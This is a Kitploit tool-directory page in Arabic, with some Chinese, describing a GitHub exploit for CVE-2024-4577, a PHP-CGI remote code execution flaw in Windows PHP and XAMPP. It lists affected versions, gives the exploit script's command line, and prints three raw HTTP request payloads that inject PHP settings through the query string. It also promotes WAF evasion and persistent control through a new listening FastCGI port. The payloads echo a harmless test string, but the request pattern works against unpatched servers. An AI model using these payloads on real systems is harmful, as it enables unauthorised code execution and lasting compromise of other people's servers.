Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577-PHP-RCE | Kitploit
أدوات/GitHubGitHub/a-roshbaik/cve-2024-4577-php-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراق
GitHuba-roshbaik/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4577-PHP-RCE

نظرة عامة على المشروع والمبدأ

  • أول EXP في العالم لثغرة CVE-2024-4577 PHP-CGI RCE باستخدام بيئة PHP الافتراضية (XAMPP).
  • أول استغلال في العالم لثغرة CVE-2024-4577 PHP-CGI RCE يستخدم بيئة PHP الافتراضية. يشارك استغلالًا أصليًا، ويدعم SSRF، ويدعم تجاوز WAF.
  • يحقق RCE في بيئة PHP الافتراضية. المبدأ: cgi.force_redirect + REDIRECT-STATUS.
  • يضيف EXP أصليًا جديدًا يدعم أسلوب تجاوز WAF. المبدأ: إنشاء خادم FastCGI + التواصل عبر بروتوكول FastCGI.
  • يضيف EXP أصليًا جديدًا يدعم أسلوب سيناريو SSRF. المبدأ: بروتوكول data:// + طلب GET.

مزايا EXP 1

  • يمكن تحقيق RCE دون الحاجة إلى allow_url_include أو auto_prepend_file أو auto_append_file. يمكن تضمين أي ملفات وملفات PHP.
  • لن تظهر الكلمات المفتاحية التي يعترضها WAF عادةً مثل allow_url_include وauto_prepend_file وauto_append_file.
  • لن يتم تسجيل جميع اتصالات خادم FastCGI بواسطة WAF.
  • يستمع على منفذ جديد، وبالتالي يحقق تحكمًا مستدامًا في خادم PHP، بشكل مستقل عن Apache وPHP.

ملخص الثغرة

المعلومةالقيمة
اسم الثغرةPHP RCE
معرف الثغرةCVE-2024-4577
مستوى الخطورةعالٍ
نوع الثغرةRCE

الإصدارات المتأثرة

  • PHP إصدار ويندوز 8.3.0 <= الإصدار المتأثر < 8.3.8
  • PHP إصدار ويندوز 8.2.0 <= الإصدار المتأثر < 8.2.20
  • PHP إصدار ويندوز 8.1.0 <= الإصدار المتأثر < 8.1.29
  • PHP إصدار ويندوز الإصدار المتأثر == 8.0.x
  • PHP إصدار ويندوز الإصدار المتأثر == 7.x
  • PHP إصدار ويندوز الإصدار المتأثر == 5.x
  • XAMPP إصدار ويندوز 8.2.0 <= الإصدار المتأثر <= 8.2.12
  • XAMPP إصدار ويندوز 8.1.0 <= الإصدار المتأثر <= 8.1.25
  • XAMPP إصدار ويندوز الإصدار المتأثر == 8.0.x
  • XAMPP إصدار ويندوز الإصدار المتأثر == 7.x
  • XAMPP إصدار ويندوز الإصدار المتأثر == 5.x

EXP 1

يمكن استخدامه في سيناريو تجاوز WAF + السيناريو الافتراضي:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

مثال:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

يمكن استخدامه في سيناريو SSRF + السيناريو الافتراضي:

root@kitploit:~
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

يمكن استخدامه في السيناريو الافتراضي:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

يمكن استخدامه في السيناريو الافتراضي:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

إعادة الإنتاج

  1. بيئة الخادم:
root@kitploit:~
XAMPP Windows版 8.2.12
  1. تنزيل وتثبيت XAMPP على الخادم:
root@kitploit:~
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/

  1. إعداد الخادم
root@kitploit:~
无需任何修改,保持默认配置
  1. استخدام EXP من جانب العميل
root@kitploit:~
使用上述EXP进行测试
  1. التحقق
root@kitploit:~
观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
تنزيل الأداة
صعوبة الاستغلال
منخفضة